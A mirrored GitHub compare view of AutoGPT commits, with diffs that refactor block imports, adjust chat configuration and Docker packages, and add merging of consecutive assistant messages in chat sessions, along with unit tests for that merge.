mirror of
https://github.com/Significant-Gravitas/AutoGPT.git
synced 2026-02-12 07:45:14 -05:00
Compare commits
6 Commits
feat/copit
...
fix/copilo
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
5348d97437 | ||
|
|
113e87a23c | ||
|
|
d09f1532a4 | ||
|
|
a78145505b | ||
|
|
6573d987ea | ||
|
|
ae8ce8b4ca |
@@ -62,16 +62,12 @@ ENV POETRY_HOME=/opt/poetry \
|
|||||||
DEBIAN_FRONTEND=noninteractive
|
DEBIAN_FRONTEND=noninteractive
|
||||||
ENV PATH=/opt/poetry/bin:$PATH
|
ENV PATH=/opt/poetry/bin:$PATH
|
||||||
|
|
||||||
# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
|
# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
|
||||||
# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
|
|
||||||
RUN apt-get update && apt-get install -y \
|
RUN apt-get update && apt-get install -y \
|
||||||
python3.13 \
|
python3.13 \
|
||||||
python3-pip \
|
python3-pip \
|
||||||
ffmpeg \
|
ffmpeg \
|
||||||
imagemagick \
|
imagemagick \
|
||||||
jq \
|
|
||||||
ripgrep \
|
|
||||||
tree \
|
|
||||||
&& rm -rf /var/lib/apt/lists/*
|
&& rm -rf /var/lib/apt/lists/*
|
||||||
|
|
||||||
# Copy only necessary files from builder
|
# Copy only necessary files from builder
|
||||||
|
|||||||
@@ -10,7 +10,7 @@ from typing_extensions import TypedDict
|
|||||||
|
|
||||||
import backend.api.features.store.cache as store_cache
|
import backend.api.features.store.cache as store_cache
|
||||||
import backend.api.features.store.model as store_model
|
import backend.api.features.store.model as store_model
|
||||||
import backend.data.block
|
import backend.blocks
|
||||||
from backend.api.external.middleware import require_permission
|
from backend.api.external.middleware import require_permission
|
||||||
from backend.data import execution as execution_db
|
from backend.data import execution as execution_db
|
||||||
from backend.data import graph as graph_db
|
from backend.data import graph as graph_db
|
||||||
@@ -67,7 +67,7 @@ async def get_user_info(
|
|||||||
dependencies=[Security(require_permission(APIKeyPermission.READ_BLOCK))],
|
dependencies=[Security(require_permission(APIKeyPermission.READ_BLOCK))],
|
||||||
)
|
)
|
||||||
async def get_graph_blocks() -> Sequence[dict[Any, Any]]:
|
async def get_graph_blocks() -> Sequence[dict[Any, Any]]:
|
||||||
blocks = [block() for block in backend.data.block.get_blocks().values()]
|
blocks = [block() for block in backend.blocks.get_blocks().values()]
|
||||||
return [b.to_dict() for b in blocks if not b.disabled]
|
return [b.to_dict() for b in blocks if not b.disabled]
|
||||||
|
|
||||||
|
|
||||||
@@ -83,7 +83,7 @@ async def execute_graph_block(
|
|||||||
require_permission(APIKeyPermission.EXECUTE_BLOCK)
|
require_permission(APIKeyPermission.EXECUTE_BLOCK)
|
||||||
),
|
),
|
||||||
) -> CompletedBlockOutput:
|
) -> CompletedBlockOutput:
|
||||||
obj = backend.data.block.get_block(block_id)
|
obj = backend.blocks.get_block(block_id)
|
||||||
if not obj:
|
if not obj:
|
||||||
raise HTTPException(status_code=404, detail=f"Block #{block_id} not found.")
|
raise HTTPException(status_code=404, detail=f"Block #{block_id} not found.")
|
||||||
if obj.disabled:
|
if obj.disabled:
|
||||||
|
|||||||
@@ -10,10 +10,15 @@ import backend.api.features.library.db as library_db
|
|||||||
import backend.api.features.library.model as library_model
|
import backend.api.features.library.model as library_model
|
||||||
import backend.api.features.store.db as store_db
|
import backend.api.features.store.db as store_db
|
||||||
import backend.api.features.store.model as store_model
|
import backend.api.features.store.model as store_model
|
||||||
import backend.data.block
|
|
||||||
from backend.blocks import load_all_blocks
|
from backend.blocks import load_all_blocks
|
||||||
|
from backend.blocks._base import (
|
||||||
|
AnyBlockSchema,
|
||||||
|
BlockCategory,
|
||||||
|
BlockInfo,
|
||||||
|
BlockSchema,
|
||||||
|
BlockType,
|
||||||
|
)
|
||||||
from backend.blocks.llm import LlmModel
|
from backend.blocks.llm import LlmModel
|
||||||
from backend.data.block import AnyBlockSchema, BlockCategory, BlockInfo, BlockSchema
|
|
||||||
from backend.data.db import query_raw_with_schema
|
from backend.data.db import query_raw_with_schema
|
||||||
from backend.integrations.providers import ProviderName
|
from backend.integrations.providers import ProviderName
|
||||||
from backend.util.cache import cached
|
from backend.util.cache import cached
|
||||||
@@ -22,7 +27,7 @@ from backend.util.models import Pagination
|
|||||||
from .model import (
|
from .model import (
|
||||||
BlockCategoryResponse,
|
BlockCategoryResponse,
|
||||||
BlockResponse,
|
BlockResponse,
|
||||||
BlockType,
|
BlockTypeFilter,
|
||||||
CountResponse,
|
CountResponse,
|
||||||
FilterType,
|
FilterType,
|
||||||
Provider,
|
Provider,
|
||||||
@@ -88,7 +93,7 @@ def get_block_categories(category_blocks: int = 3) -> list[BlockCategoryResponse
|
|||||||
def get_blocks(
|
def get_blocks(
|
||||||
*,
|
*,
|
||||||
category: str | None = None,
|
category: str | None = None,
|
||||||
type: BlockType | None = None,
|
type: BlockTypeFilter | None = None,
|
||||||
provider: ProviderName | None = None,
|
provider: ProviderName | None = None,
|
||||||
page: int = 1,
|
page: int = 1,
|
||||||
page_size: int = 50,
|
page_size: int = 50,
|
||||||
@@ -669,9 +674,9 @@ async def get_suggested_blocks(count: int = 5) -> list[BlockInfo]:
|
|||||||
for block_type in load_all_blocks().values():
|
for block_type in load_all_blocks().values():
|
||||||
block: AnyBlockSchema = block_type()
|
block: AnyBlockSchema = block_type()
|
||||||
if block.disabled or block.block_type in (
|
if block.disabled or block.block_type in (
|
||||||
backend.data.block.BlockType.INPUT,
|
BlockType.INPUT,
|
||||||
backend.data.block.BlockType.OUTPUT,
|
BlockType.OUTPUT,
|
||||||
backend.data.block.BlockType.AGENT,
|
BlockType.AGENT,
|
||||||
):
|
):
|
||||||
continue
|
continue
|
||||||
# Find the execution count for this block
|
# Find the execution count for this block
|
||||||
|
|||||||
@@ -4,7 +4,7 @@ from pydantic import BaseModel
|
|||||||
|
|
||||||
import backend.api.features.library.model as library_model
|
import backend.api.features.library.model as library_model
|
||||||
import backend.api.features.store.model as store_model
|
import backend.api.features.store.model as store_model
|
||||||
from backend.data.block import BlockInfo
|
from backend.blocks._base import BlockInfo
|
||||||
from backend.integrations.providers import ProviderName
|
from backend.integrations.providers import ProviderName
|
||||||
from backend.util.models import Pagination
|
from backend.util.models import Pagination
|
||||||
|
|
||||||
@@ -15,7 +15,7 @@ FilterType = Literal[
|
|||||||
"my_agents",
|
"my_agents",
|
||||||
]
|
]
|
||||||
|
|
||||||
BlockType = Literal["all", "input", "action", "output"]
|
BlockTypeFilter = Literal["all", "input", "action", "output"]
|
||||||
|
|
||||||
|
|
||||||
class SearchEntry(BaseModel):
|
class SearchEntry(BaseModel):
|
||||||
|
|||||||
@@ -88,7 +88,7 @@ async def get_block_categories(
|
|||||||
)
|
)
|
||||||
async def get_blocks(
|
async def get_blocks(
|
||||||
category: Annotated[str | None, fastapi.Query()] = None,
|
category: Annotated[str | None, fastapi.Query()] = None,
|
||||||
type: Annotated[builder_model.BlockType | None, fastapi.Query()] = None,
|
type: Annotated[builder_model.BlockTypeFilter | None, fastapi.Query()] = None,
|
||||||
provider: Annotated[ProviderName | None, fastapi.Query()] = None,
|
provider: Annotated[ProviderName | None, fastapi.Query()] = None,
|
||||||
page: Annotated[int, fastapi.Query()] = 1,
|
page: Annotated[int, fastapi.Query()] = 1,
|
||||||
page_size: Annotated[int, fastapi.Query()] = 50,
|
page_size: Annotated[int, fastapi.Query()] = 50,
|
||||||
|
|||||||
@@ -27,11 +27,12 @@ class ChatConfig(BaseSettings):
|
|||||||
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
|
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
|
||||||
|
|
||||||
# Streaming Configuration
|
# Streaming Configuration
|
||||||
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
|
max_context_messages: int = Field(
|
||||||
max_retries: int = Field(
|
default=50, ge=1, le=200, description="Maximum context messages"
|
||||||
default=3,
|
|
||||||
description="Max retries for fallback path (SDK handles retries internally)",
|
|
||||||
)
|
)
|
||||||
|
|
||||||
|
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
|
||||||
|
max_retries: int = Field(default=3, description="Maximum number of retries")
|
||||||
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
|
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
|
||||||
max_agent_schedules: int = Field(
|
max_agent_schedules: int = Field(
|
||||||
default=30, description="Maximum number of agent schedules"
|
default=30, description="Maximum number of agent schedules"
|
||||||
@@ -92,17 +93,6 @@ class ChatConfig(BaseSettings):
|
|||||||
description="Name of the prompt in Langfuse to fetch",
|
description="Name of the prompt in Langfuse to fetch",
|
||||||
)
|
)
|
||||||
|
|
||||||
# Claude Agent SDK Configuration
|
|
||||||
use_claude_agent_sdk: bool = Field(
|
|
||||||
default=True,
|
|
||||||
description="Use Claude Agent SDK for chat completions",
|
|
||||||
)
|
|
||||||
sdk_max_buffer_size: int = Field(
|
|
||||||
default=10 * 1024 * 1024, # 10MB (default SDK is 1MB)
|
|
||||||
description="Max buffer size in bytes for SDK JSON message parsing. "
|
|
||||||
"Increase if tool outputs exceed the limit.",
|
|
||||||
)
|
|
||||||
|
|
||||||
# Extended thinking configuration for Claude models
|
# Extended thinking configuration for Claude models
|
||||||
thinking_enabled: bool = Field(
|
thinking_enabled: bool = Field(
|
||||||
default=True,
|
default=True,
|
||||||
@@ -148,17 +138,6 @@ class ChatConfig(BaseSettings):
|
|||||||
v = os.getenv("CHAT_INTERNAL_API_KEY")
|
v = os.getenv("CHAT_INTERNAL_API_KEY")
|
||||||
return v
|
return v
|
||||||
|
|
||||||
@field_validator("use_claude_agent_sdk", mode="before")
|
|
||||||
@classmethod
|
|
||||||
def get_use_claude_agent_sdk(cls, v):
|
|
||||||
"""Get use_claude_agent_sdk from environment if not provided."""
|
|
||||||
# Check environment variable - default to True if not set
|
|
||||||
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
|
|
||||||
if env_val:
|
|
||||||
return env_val in ("true", "1", "yes", "on")
|
|
||||||
# Default to True (SDK enabled by default)
|
|
||||||
return True if v is None else v
|
|
||||||
|
|
||||||
# Prompt paths for different contexts
|
# Prompt paths for different contexts
|
||||||
PROMPT_PATHS: dict[str, str] = {
|
PROMPT_PATHS: dict[str, str] = {
|
||||||
"default": "prompts/chat_system.md",
|
"default": "prompts/chat_system.md",
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ import asyncio
|
|||||||
import logging
|
import logging
|
||||||
import uuid
|
import uuid
|
||||||
from datetime import UTC, datetime
|
from datetime import UTC, datetime
|
||||||
from typing import Any
|
from typing import Any, cast
|
||||||
from weakref import WeakValueDictionary
|
from weakref import WeakValueDictionary
|
||||||
|
|
||||||
from openai.types.chat import (
|
from openai.types.chat import (
|
||||||
@@ -104,6 +104,26 @@ class ChatSession(BaseModel):
|
|||||||
successful_agent_runs: dict[str, int] = {}
|
successful_agent_runs: dict[str, int] = {}
|
||||||
successful_agent_schedules: dict[str, int] = {}
|
successful_agent_schedules: dict[str, int] = {}
|
||||||
|
|
||||||
|
def add_tool_call_to_current_turn(self, tool_call: dict) -> None:
|
||||||
|
"""Attach a tool_call to the current turn's assistant message.
|
||||||
|
|
||||||
|
Searches backwards for the most recent assistant message (stopping at
|
||||||
|
any user message boundary). If found, appends the tool_call to it.
|
||||||
|
Otherwise creates a new assistant message with the tool_call.
|
||||||
|
"""
|
||||||
|
for msg in reversed(self.messages):
|
||||||
|
if msg.role == "user":
|
||||||
|
break
|
||||||
|
if msg.role == "assistant":
|
||||||
|
if not msg.tool_calls:
|
||||||
|
msg.tool_calls = []
|
||||||
|
msg.tool_calls.append(tool_call)
|
||||||
|
return
|
||||||
|
|
||||||
|
self.messages.append(
|
||||||
|
ChatMessage(role="assistant", content="", tool_calls=[tool_call])
|
||||||
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def new(user_id: str) -> "ChatSession":
|
def new(user_id: str) -> "ChatSession":
|
||||||
return ChatSession(
|
return ChatSession(
|
||||||
@@ -172,6 +192,47 @@ class ChatSession(BaseModel):
|
|||||||
successful_agent_schedules=successful_agent_schedules,
|
successful_agent_schedules=successful_agent_schedules,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _merge_consecutive_assistant_messages(
|
||||||
|
messages: list[ChatCompletionMessageParam],
|
||||||
|
) -> list[ChatCompletionMessageParam]:
|
||||||
|
"""Merge consecutive assistant messages into single messages.
|
||||||
|
|
||||||
|
Long-running tool flows can create split assistant messages: one with
|
||||||
|
text content and another with tool_calls. Anthropic's API requires
|
||||||
|
tool_result blocks to reference a tool_use in the immediately preceding
|
||||||
|
assistant message, so these splits cause 400 errors via OpenRouter.
|
||||||
|
"""
|
||||||
|
if len(messages) < 2:
|
||||||
|
return messages
|
||||||
|
|
||||||
|
result: list[ChatCompletionMessageParam] = [messages[0]]
|
||||||
|
for msg in messages[1:]:
|
||||||
|
prev = result[-1]
|
||||||
|
if prev.get("role") != "assistant" or msg.get("role") != "assistant":
|
||||||
|
result.append(msg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
prev = cast(ChatCompletionAssistantMessageParam, prev)
|
||||||
|
curr = cast(ChatCompletionAssistantMessageParam, msg)
|
||||||
|
|
||||||
|
curr_content = curr.get("content") or ""
|
||||||
|
if curr_content:
|
||||||
|
prev_content = prev.get("content") or ""
|
||||||
|
prev["content"] = (
|
||||||
|
f"{prev_content}\n{curr_content}" if prev_content else curr_content
|
||||||
|
)
|
||||||
|
|
||||||
|
curr_tool_calls = curr.get("tool_calls")
|
||||||
|
if curr_tool_calls:
|
||||||
|
prev_tool_calls = prev.get("tool_calls")
|
||||||
|
prev["tool_calls"] = (
|
||||||
|
list(prev_tool_calls) + list(curr_tool_calls)
|
||||||
|
if prev_tool_calls
|
||||||
|
else list(curr_tool_calls)
|
||||||
|
)
|
||||||
|
return result
|
||||||
|
|
||||||
def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
|
def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
|
||||||
messages = []
|
messages = []
|
||||||
for message in self.messages:
|
for message in self.messages:
|
||||||
@@ -258,7 +319,7 @@ class ChatSession(BaseModel):
|
|||||||
name=message.name or "",
|
name=message.name or "",
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
return messages
|
return self._merge_consecutive_assistant_messages(messages)
|
||||||
|
|
||||||
|
|
||||||
async def _get_session_from_cache(session_id: str) -> ChatSession | None:
|
async def _get_session_from_cache(session_id: str) -> ChatSession | None:
|
||||||
@@ -273,8 +334,9 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
|
|||||||
try:
|
try:
|
||||||
session = ChatSession.model_validate_json(raw_session)
|
session = ChatSession.model_validate_json(raw_session)
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
|
f"Loading session {session_id} from cache: "
|
||||||
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles
|
f"message_count={len(session.messages)}, "
|
||||||
|
f"roles={[m.role for m in session.messages]}"
|
||||||
)
|
)
|
||||||
return session
|
return session
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
@@ -316,9 +378,11 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
messages = prisma_session.Messages
|
messages = prisma_session.Messages
|
||||||
logger.debug(
|
logger.info(
|
||||||
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
|
f"Loading session {session_id} from DB: "
|
||||||
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles
|
f"has_messages={messages is not None}, "
|
||||||
|
f"message_count={len(messages) if messages else 0}, "
|
||||||
|
f"roles={[m.role for m in messages] if messages else []}"
|
||||||
)
|
)
|
||||||
|
|
||||||
return ChatSession.from_db(prisma_session, messages)
|
return ChatSession.from_db(prisma_session, messages)
|
||||||
@@ -369,9 +433,10 @@ async def _save_session_to_db(
|
|||||||
"function_call": msg.function_call,
|
"function_call": msg.function_call,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
logger.debug(
|
logger.info(
|
||||||
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
|
f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
|
||||||
f"roles={[m['role'] for m in messages_data]}"
|
f"roles={[m['role'] for m in messages_data]}, "
|
||||||
|
f"start_sequence={existing_message_count}"
|
||||||
)
|
)
|
||||||
await chat_db.add_chat_messages_batch(
|
await chat_db.add_chat_messages_batch(
|
||||||
session_id=session.session_id,
|
session_id=session.session_id,
|
||||||
@@ -411,7 +476,7 @@ async def get_chat_session(
|
|||||||
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
|
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
|
||||||
|
|
||||||
# Fall back to database
|
# Fall back to database
|
||||||
logger.debug(f"Session {session_id} not in cache, checking database")
|
logger.info(f"Session {session_id} not in cache, checking database")
|
||||||
session = await _get_session_from_db(session_id)
|
session = await _get_session_from_db(session_id)
|
||||||
|
|
||||||
if session is None:
|
if session is None:
|
||||||
@@ -428,6 +493,7 @@ async def get_chat_session(
|
|||||||
# Cache the session from DB
|
# Cache the session from DB
|
||||||
try:
|
try:
|
||||||
await _cache_session(session)
|
await _cache_session(session)
|
||||||
|
logger.info(f"Cached session {session_id} from database")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
logger.warning(f"Failed to cache session {session_id}: {e}")
|
logger.warning(f"Failed to cache session {session_id}: {e}")
|
||||||
|
|
||||||
@@ -492,40 +558,6 @@ async def upsert_chat_session(
|
|||||||
return session
|
return session
|
||||||
|
|
||||||
|
|
||||||
async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
|
|
||||||
"""Atomically append a message to a session and persist it.
|
|
||||||
|
|
||||||
Acquires the session lock, re-fetches the latest session state,
|
|
||||||
appends the message, and saves — preventing message loss when
|
|
||||||
concurrent requests modify the same session.
|
|
||||||
"""
|
|
||||||
lock = await _get_session_lock(session_id)
|
|
||||||
|
|
||||||
async with lock:
|
|
||||||
session = await get_chat_session(session_id)
|
|
||||||
if session is None:
|
|
||||||
raise ValueError(f"Session {session_id} not found")
|
|
||||||
|
|
||||||
session.messages.append(message)
|
|
||||||
existing_message_count = await chat_db.get_chat_session_message_count(
|
|
||||||
session_id
|
|
||||||
)
|
|
||||||
|
|
||||||
try:
|
|
||||||
await _save_session_to_db(session, existing_message_count)
|
|
||||||
except Exception as e:
|
|
||||||
raise DatabaseError(
|
|
||||||
f"Failed to persist message to session {session_id}"
|
|
||||||
) from e
|
|
||||||
|
|
||||||
try:
|
|
||||||
await _cache_session(session)
|
|
||||||
except Exception as e:
|
|
||||||
logger.warning(f"Cache write failed for session {session_id}: {e}")
|
|
||||||
|
|
||||||
return session
|
|
||||||
|
|
||||||
|
|
||||||
async def create_chat_session(user_id: str) -> ChatSession:
|
async def create_chat_session(user_id: str) -> ChatSession:
|
||||||
"""Create a new chat session and persist it.
|
"""Create a new chat session and persist it.
|
||||||
|
|
||||||
@@ -632,19 +664,13 @@ async def update_session_title(session_id: str, title: str) -> bool:
|
|||||||
logger.warning(f"Session {session_id} not found for title update")
|
logger.warning(f"Session {session_id} not found for title update")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# Update title in cache if it exists (instead of invalidating).
|
# Invalidate cache so next fetch gets updated title
|
||||||
# This prevents race conditions where cache invalidation causes
|
|
||||||
# the frontend to see stale DB data while streaming is still in progress.
|
|
||||||
try:
|
try:
|
||||||
cached = await _get_session_from_cache(session_id)
|
redis_key = _get_session_cache_key(session_id)
|
||||||
if cached:
|
async_redis = await get_redis_async()
|
||||||
cached.title = title
|
await async_redis.delete(redis_key)
|
||||||
await _cache_session(cached)
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
# Not critical - title will be correct on next full cache refresh
|
logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
|
||||||
logger.warning(
|
|
||||||
f"Failed to update title in cache for session {session_id}: {e}"
|
|
||||||
)
|
|
||||||
|
|
||||||
return True
|
return True
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
|||||||
@@ -1,4 +1,16 @@
|
|||||||
|
from typing import cast
|
||||||
|
|
||||||
import pytest
|
import pytest
|
||||||
|
from openai.types.chat import (
|
||||||
|
ChatCompletionAssistantMessageParam,
|
||||||
|
ChatCompletionMessageParam,
|
||||||
|
ChatCompletionToolMessageParam,
|
||||||
|
ChatCompletionUserMessageParam,
|
||||||
|
)
|
||||||
|
from openai.types.chat.chat_completion_message_tool_call_param import (
|
||||||
|
ChatCompletionMessageToolCallParam,
|
||||||
|
Function,
|
||||||
|
)
|
||||||
|
|
||||||
from .model import (
|
from .model import (
|
||||||
ChatMessage,
|
ChatMessage,
|
||||||
@@ -117,3 +129,205 @@ async def test_chatsession_db_storage(setup_test_user, test_user_id):
|
|||||||
loaded.tool_calls is not None
|
loaded.tool_calls is not None
|
||||||
), f"Tool calls missing for {orig.role} message"
|
), f"Tool calls missing for {orig.role} message"
|
||||||
assert len(orig.tool_calls) == len(loaded.tool_calls)
|
assert len(orig.tool_calls) == len(loaded.tool_calls)
|
||||||
|
|
||||||
|
|
||||||
|
# --------------------------------------------------------------------------- #
|
||||||
|
# _merge_consecutive_assistant_messages #
|
||||||
|
# --------------------------------------------------------------------------- #
|
||||||
|
|
||||||
|
_tc = ChatCompletionMessageToolCallParam(
|
||||||
|
id="tc1", type="function", function=Function(name="do_stuff", arguments="{}")
|
||||||
|
)
|
||||||
|
_tc2 = ChatCompletionMessageToolCallParam(
|
||||||
|
id="tc2", type="function", function=Function(name="other", arguments="{}")
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def test_merge_noop_when_no_consecutive_assistants():
|
||||||
|
"""Messages without consecutive assistants are returned unchanged."""
|
||||||
|
msgs = [
|
||||||
|
ChatCompletionUserMessageParam(role="user", content="hi"),
|
||||||
|
ChatCompletionAssistantMessageParam(role="assistant", content="hello"),
|
||||||
|
ChatCompletionUserMessageParam(role="user", content="bye"),
|
||||||
|
]
|
||||||
|
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
|
||||||
|
assert len(merged) == 3
|
||||||
|
assert [m["role"] for m in merged] == ["user", "assistant", "user"]
|
||||||
|
|
||||||
|
|
||||||
|
def test_merge_splits_text_and_tool_calls():
|
||||||
|
"""The exact bug scenario: text-only assistant followed by tool_calls-only assistant."""
|
||||||
|
msgs = [
|
||||||
|
ChatCompletionUserMessageParam(role="user", content="build agent"),
|
||||||
|
ChatCompletionAssistantMessageParam(
|
||||||
|
role="assistant", content="Let me build that"
|
||||||
|
),
|
||||||
|
ChatCompletionAssistantMessageParam(
|
||||||
|
role="assistant", content="", tool_calls=[_tc]
|
||||||
|
),
|
||||||
|
ChatCompletionToolMessageParam(role="tool", content="ok", tool_call_id="tc1"),
|
||||||
|
]
|
||||||
|
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
|
||||||
|
|
||||||
|
assert len(merged) == 3
|
||||||
|
assert merged[0]["role"] == "user"
|
||||||
|
assert merged[2]["role"] == "tool"
|
||||||
|
a = cast(ChatCompletionAssistantMessageParam, merged[1])
|
||||||
|
assert a["role"] == "assistant"
|
||||||
|
assert a.get("content") == "Let me build that"
|
||||||
|
assert a.get("tool_calls") == [_tc]
|
||||||
|
|
||||||
|
|
||||||
|
def test_merge_combines_tool_calls_from_both():
|
||||||
|
"""Both consecutive assistants have tool_calls — they get merged."""
|
||||||
|
msgs: list[ChatCompletionAssistantMessageParam] = [
|
||||||
|
ChatCompletionAssistantMessageParam(
|
||||||
|
role="assistant", content="text", tool_calls=[_tc]
|
||||||
|
),
|
||||||
|
ChatCompletionAssistantMessageParam(
|
||||||
|
role="assistant", content="", tool_calls=[_tc2]
|
||||||
|
),
|
||||||
|
]
|
||||||
|
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
|
||||||
|
|
||||||
|
assert len(merged) == 1
|
||||||
|
a = cast(ChatCompletionAssistantMessageParam, merged[0])
|
||||||
|
assert a.get("tool_calls") == [_tc, _tc2]
|
||||||
|
assert a.get("content") == "text"
|
||||||
|
|
||||||
|
|
||||||
|
def test_merge_three_consecutive_assistants():
|
||||||
|
"""Three consecutive assistants collapse into one."""
|
||||||
|
msgs: list[ChatCompletionAssistantMessageParam] = [
|
||||||
|
ChatCompletionAssistantMessageParam(role="assistant", content="a"),
|
||||||
|
ChatCompletionAssistantMessageParam(role="assistant", content="b"),
|
||||||
|
ChatCompletionAssistantMessageParam(
|
||||||
|
role="assistant", content="", tool_calls=[_tc]
|
||||||
|
),
|
||||||
|
]
|
||||||
|
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
|
||||||
|
|
||||||
|
assert len(merged) == 1
|
||||||
|
a = cast(ChatCompletionAssistantMessageParam, merged[0])
|
||||||
|
assert a.get("content") == "a\nb"
|
||||||
|
assert a.get("tool_calls") == [_tc]
|
||||||
|
|
||||||
|
|
||||||
|
def test_merge_empty_and_single_message():
|
||||||
|
"""Edge cases: empty list and single message."""
|
||||||
|
assert ChatSession._merge_consecutive_assistant_messages([]) == []
|
||||||
|
|
||||||
|
single: list[ChatCompletionMessageParam] = [
|
||||||
|
ChatCompletionUserMessageParam(role="user", content="hi")
|
||||||
|
]
|
||||||
|
assert ChatSession._merge_consecutive_assistant_messages(single) == single
|
||||||
|
|
||||||
|
|
||||||
|
# --------------------------------------------------------------------------- #
|
||||||
|
# add_tool_call_to_current_turn #
|
||||||
|
# --------------------------------------------------------------------------- #
|
||||||
|
|
||||||
|
_raw_tc = {
|
||||||
|
"id": "tc1",
|
||||||
|
"type": "function",
|
||||||
|
"function": {"name": "f", "arguments": "{}"},
|
||||||
|
}
|
||||||
|
_raw_tc2 = {
|
||||||
|
"id": "tc2",
|
||||||
|
"type": "function",
|
||||||
|
"function": {"name": "g", "arguments": "{}"},
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def test_add_tool_call_appends_to_existing_assistant():
|
||||||
|
"""When the last assistant is from the current turn, tool_call is added to it."""
|
||||||
|
session = ChatSession.new(user_id="u")
|
||||||
|
session.messages = [
|
||||||
|
ChatMessage(role="user", content="hi"),
|
||||||
|
ChatMessage(role="assistant", content="working on it"),
|
||||||
|
]
|
||||||
|
session.add_tool_call_to_current_turn(_raw_tc)
|
||||||
|
|
||||||
|
assert len(session.messages) == 2 # no new message created
|
||||||
|
assert session.messages[1].tool_calls == [_raw_tc]
|
||||||
|
|
||||||
|
|
||||||
|
def test_add_tool_call_creates_assistant_when_none_exists():
|
||||||
|
"""When there's no current-turn assistant, a new one is created."""
|
||||||
|
session = ChatSession.new(user_id="u")
|
||||||
|
session.messages = [
|
||||||
|
ChatMessage(role="user", content="hi"),
|
||||||
|
]
|
||||||
|
session.add_tool_call_to_current_turn(_raw_tc)
|
||||||
|
|
||||||
|
assert len(session.messages) == 2
|
||||||
|
assert session.messages[1].role == "assistant"
|
||||||
|
assert session.messages[1].tool_calls == [_raw_tc]
|
||||||
|
|
||||||
|
|
||||||
|
def test_add_tool_call_does_not_cross_user_boundary():
|
||||||
|
"""A user message acts as a boundary — previous assistant is not modified."""
|
||||||
|
session = ChatSession.new(user_id="u")
|
||||||
|
session.messages = [
|
||||||
|
ChatMessage(role="assistant", content="old turn"),
|
||||||
|
ChatMessage(role="user", content="new message"),
|
||||||
|
]
|
||||||
|
session.add_tool_call_to_current_turn(_raw_tc)
|
||||||
|
|
||||||
|
assert len(session.messages) == 3 # new assistant was created
|
||||||
|
assert session.messages[0].tool_calls is None # old assistant untouched
|
||||||
|
assert session.messages[2].role == "assistant"
|
||||||
|
assert session.messages[2].tool_calls == [_raw_tc]
|
||||||
|
|
||||||
|
|
||||||
|
def test_add_tool_call_multiple_times():
|
||||||
|
"""Multiple long-running tool calls accumulate on the same assistant."""
|
||||||
|
session = ChatSession.new(user_id="u")
|
||||||
|
session.messages = [
|
||||||
|
ChatMessage(role="user", content="hi"),
|
||||||
|
ChatMessage(role="assistant", content="doing stuff"),
|
||||||
|
]
|
||||||
|
session.add_tool_call_to_current_turn(_raw_tc)
|
||||||
|
# Simulate a pending tool result in between (like _yield_tool_call does)
|
||||||
|
session.messages.append(
|
||||||
|
ChatMessage(role="tool", content="pending", tool_call_id="tc1")
|
||||||
|
)
|
||||||
|
session.add_tool_call_to_current_turn(_raw_tc2)
|
||||||
|
|
||||||
|
assert len(session.messages) == 3 # user, assistant, tool — no extra assistant
|
||||||
|
assert session.messages[1].tool_calls == [_raw_tc, _raw_tc2]
|
||||||
|
|
||||||
|
|
||||||
|
def test_to_openai_messages_merges_split_assistants():
|
||||||
|
"""End-to-end: session with split assistants produces valid OpenAI messages."""
|
||||||
|
session = ChatSession.new(user_id="u")
|
||||||
|
session.messages = [
|
||||||
|
ChatMessage(role="user", content="build agent"),
|
||||||
|
ChatMessage(role="assistant", content="Let me build that"),
|
||||||
|
ChatMessage(
|
||||||
|
role="assistant",
|
||||||
|
content="",
|
||||||
|
tool_calls=[
|
||||||
|
{
|
||||||
|
"id": "tc1",
|
||||||
|
"type": "function",
|
||||||
|
"function": {"name": "create_agent", "arguments": "{}"},
|
||||||
|
}
|
||||||
|
],
|
||||||
|
),
|
||||||
|
ChatMessage(role="tool", content="done", tool_call_id="tc1"),
|
||||||
|
ChatMessage(role="assistant", content="Saved!"),
|
||||||
|
ChatMessage(role="user", content="show me an example run"),
|
||||||
|
]
|
||||||
|
